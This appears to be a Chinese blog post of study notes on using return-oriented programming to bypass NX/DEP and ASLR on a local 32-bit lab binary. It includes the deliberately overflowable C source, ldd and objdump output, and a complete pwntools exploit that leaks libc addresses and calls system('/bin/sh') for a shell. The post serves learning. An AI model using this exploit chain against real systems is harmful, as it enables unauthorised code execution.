<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="PWN," />










<meta name="description" content="0x00 前言看蒸米师傅的一步一步学ROP做的笔记">
<meta name="keywords" content="PWN">
<meta property="og:type" content="article">
<meta property="og:title" content="通过ROP绕过DEP和ASLR防护">
<meta property="og:url" content="http://yoursite.com/2018/03/17/通过ROP绕过NX和ASLR防护/index.html">
<meta property="og:site_name" content="Mask&#39;s Blog">
<meta property="og:description" content="0x00 前言看蒸米师傅的一步一步学ROP做的笔记">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2018/03/17/通过ROP绕过NX和ASLR防护/1.png">
<meta property="og:updated_time" content="2018-03-17T13:09:39.808Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="通过ROP绕过DEP和ASLR防护">
<meta name="twitter:description" content="0x00 前言看蒸米师傅的一步一步学ROP做的笔记">
<meta name="twitter:image" content="http://yoursite.com/2018/03/17/通过ROP绕过NX和ASLR防护/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/03/17/通过ROP绕过NX和ASLR防护/"/>





  <title>通过ROP绕过DEP和ASLR防护 | Mask's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mask's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/About/" rel="section">
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/03/17/通过ROP绕过NX和ASLR防护/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Mask">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mask's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">通过ROP绕过DEP和ASLR防护</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-03-17T19:22:31+08:00">
                2018-03-17
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>看蒸米师傅的一步一步学ROP做的笔记</p>
<a id="more"></a>
<h2 id="0x01-程序源代码："><a href="#0x01-程序源代码：" class="headerlink" title="0x01 程序源代码："></a>0x01 程序源代码：</h2><p>和之前一样</p>
<p>​    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">void vulnerable_function() &#123;</span><br><span class="line">char buf[128];</span><br><span class="line">read(STDIN_FILENO, buf, 256);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char** argv) &#123;</span><br><span class="line">vulnerable_function();</span><br><span class="line">write(STDOUT_FILENO, &quot;Hello, World\n&quot;, 13);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>那么现在开启ASLR，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -s </span><br><span class="line">echo 2 &gt; /proc/sys/kernel/randomize_va_space</span><br></pre></td></tr></table></figure>
<p>查看一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@mask-virtual-machine:~/mzheng# cat /proc/sys/kernel/randomize_va_space</span><br><span class="line">2</span><br></pre></td></tr></table></figure>
<p>然后查看一下：<br>​    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb77e5000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb7615000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x80020000)</span><br><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb776a000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb759a000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x80047000)</span><br><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb7714000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb7544000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x8008c000)</span><br><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb77e2000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb7612000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x80020000)</span><br><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb77b9000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb75e9000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x8001a000)</span><br><span class="line">root@mask-virtual-machine:~/mzheng# ldd ./level2</span><br><span class="line">	linux-gate.so.1 =&gt;  (0xb7796000)</span><br><span class="line">	libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb75c6000)</span><br><span class="line">	/lib/ld-linux.so.2 (0x800c2000)</span><br></pre></td></tr></table></figure>
<p>你会发现，libc.so的地址每次都不一样，一直在变化，那么怎么办呢？</p>
<blockquote>
<p>思路是：我们需要先泄漏出libc.so某些函数在内存中的地址，然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/sh字符串在内存中的地址，然后再执行我们的ret2libc的shellcode。</p>
</blockquote>
<p>这里结合蒸米师傅给的那张图</p>
<img src="/2018/03/17/通过ROP绕过NX和ASLR防护/1.png">
<p>栈，libc，heap的地址都是随机的，但是程序本身在内存中的地址并不是随机的</p>
<p>所以我们只要把返回值设置到程序本身就可执行我们期望的指令了</p>
<p>首先查看可以利用的plt函数以及对应的got表，这里提到的几个概念可以参考这篇文章 <a href="http://www.freebuf.com/articles/system/135685.html" title="Linux中的GOT和PLT到底是个啥？" target="_blank" rel="noopener">Linux中的GOT和PLT到底是个啥？</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">root@mask-virtual-machine:~/mzheng# objdump -d -j .plt level2</span><br><span class="line"></span><br><span class="line">level2： 文件格式 elf32-i386</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">Disassembly of section .plt:</span><br><span class="line"></span><br><span class="line">080482f0 &lt;read@plt-0x10&gt;:</span><br><span class="line"> 80482f0:	ff 35 04 a0 04 08	pushl  0x804a004</span><br><span class="line"> 80482f6:	ff 25 08 a0 04 08	jmp*0x804a008</span><br><span class="line"> 80482fc:	00 00	add%al,(%eax)</span><br><span class="line">	...</span><br><span class="line"></span><br><span class="line">08048300 &lt;read@plt&gt;:</span><br><span class="line"> 8048300:	ff 25 0c a0 04 08	jmp*0x804a00c</span><br><span class="line"> 8048306:	68 00 00 00 00   	push   $0x0</span><br><span class="line"> 804830b:	e9 e0 ff ff ff   	jmp80482f0 &lt;_init+0x28&gt;</span><br><span class="line"></span><br><span class="line">08048310 &lt;__libc_start_main@plt&gt;:</span><br><span class="line"> 8048310:	ff 25 10 a0 04 08	jmp*0x804a010</span><br><span class="line"> 8048316:	68 08 00 00 00   	push   $0x8</span><br><span class="line"> 804831b:	e9 d0 ff ff ff   	jmp80482f0 &lt;_init+0x28&gt;</span><br><span class="line"></span><br><span class="line">08048320 &lt;write@plt&gt;:</span><br><span class="line"> 8048320:	ff 25 14 a0 04 08	jmp*0x804a014</span><br><span class="line"> 8048326:	68 10 00 00 00   	push   $0x10</span><br><span class="line"> 804832b:	e9 c0 ff ff ff   	jmp80482f0 &lt;_init+0x28&gt;</span><br><span class="line">root@mask-virtual-machine:~/mzheng#</span><br></pre></td></tr></table></figure>
<p>这里蒸米师傅解释的很清楚，我就摘抄了下来：</p>
<blockquote>
<p>我们发现除了程序本身的实现的函数之外，我们还可以使用read@plt()和write@plt()函数。但因为程序本身并没有调用system()函数，所以我们并不能直接调用system()来获取shell。但其实我们有write@plt()函数就够了，因为我们可以通过write@plt ()函数把write()函数在内存中的地址也就是write.got给打印出来。既然write()函数实现是在libc.so当中，那我们调用的write@plt()函数为什么也能实现write()功能呢? 这是因为linux采用了延时绑定技术，当我们调用write@plit()的时候，系统会将真正的write()函数地址link到got表的write.got中，然后write@plit()会根据write.got 跳转到真正的write()函数上去。（如果还是搞不清楚的话，推荐阅读《程序员的自我修养 - 链接、装载与库》这本书）</p>
<p>因为system()函数和write()在libc.so中的offset(相对地址)是不变的，所以如果我们得到了write()的地址并且拥有目标服务器上的libc.so就可以计算出system()在内存中的地址了。然后我们再将pc指针return回vulnerable_function()函数，就可以进行ret2libc溢出攻击，并且这一次我们知道了system()在内存中的地址，就可以调用system()函数来获取我们的shell了。</p>
</blockquote>
<p>然后exp以及代码解释：<br>​    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">libc = ELF(&apos;libc.so&apos;) #这里调用了pwntools的ELF()函数，目的是为了后面算偏移地址</span><br><span class="line">elf = ELF(&apos;level2&apos;)</span><br><span class="line"></span><br><span class="line">p = process(&apos;./level2&apos;)</span><br><span class="line">#p = remote(&apos;127.0.0.1&apos;, 10003)</span><br><span class="line"></span><br><span class="line">plt_write = elf.symbols[&apos;write&apos;]</span><br><span class="line">print &apos;plt_write= &apos; + hex(plt_write)</span><br><span class="line">got_write = elf.got[&apos;write&apos;]</span><br><span class="line">print &apos;got_write= &apos; + hex(got_write)</span><br><span class="line">vulfun_addr =0x0804843b</span><br><span class="line">print &apos;vulfun= &apos; + hex(vulfun_addr)</span><br><span class="line"></span><br><span class="line">payload1 = &apos;a&apos;*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)</span><br><span class="line"></span><br><span class="line">#payload1的作用相当于调用了一次write(1,gotwrite,4),打印出了got表处write函数位置的值，然后返回到vulfun函数</span><br><span class="line"></span><br><span class="line">print &quot;\n###sending payload1 ...###&quot;</span><br><span class="line">p.send(payload1)</span><br><span class="line"></span><br><span class="line">print &quot;\n###receving write() addr...###&quot;</span><br><span class="line">write_addr = u32(p.recv(4))</span><br><span class="line">print &apos;write_addr=&apos; + hex(write_addr)</span><br><span class="line"></span><br><span class="line">print &quot;\n###calculating system() addr and \&quot;/bin/sh\&quot; addr...###&quot;</span><br><span class="line">system_addr = write_addr - (libc.symbols[&apos;write&apos;] - libc.symbols[&apos;system&apos;])</span><br><span class="line">print &apos;system_addr= &apos; + hex(system_addr)</span><br><span class="line">binsh_addr = write_addr - (libc.symbols[&apos;write&apos;] - next(libc.search(&apos;/bin/sh&apos;)))</span><br><span class="line">print &apos;binsh_addr= &apos; + hex(binsh_addr)</span><br><span class="line"></span><br><span class="line">payload2 = &apos;a&apos;*140  + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)</span><br><span class="line"></span><br><span class="line">#即调用system(&quot;/bin/sh&quot;)</span><br><span class="line"></span><br><span class="line">print &quot;\n###sending payload2 ...###&quot;</span><br><span class="line">p.send(payload2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PWN/" rel="tag"># PWN</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/17/Linux下简单的栈溢出/" rel="next" title="Linux下简单的栈溢出">
                <i class="fa fa-chevron-left"></i> Linux下简单的栈溢出
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/03/17/通过ret2libc绕过NX防护/" rel="prev" title="通过ret2libc绕过DEP防护">
                通过ret2libc绕过DEP防护 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="Mask" />
            
              <p class="site-author-name" itemprop="name">Mask</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-程序源代码："><span class="nav-number">2.</span> <span class="nav-text">0x01 程序源代码：</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Mask</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
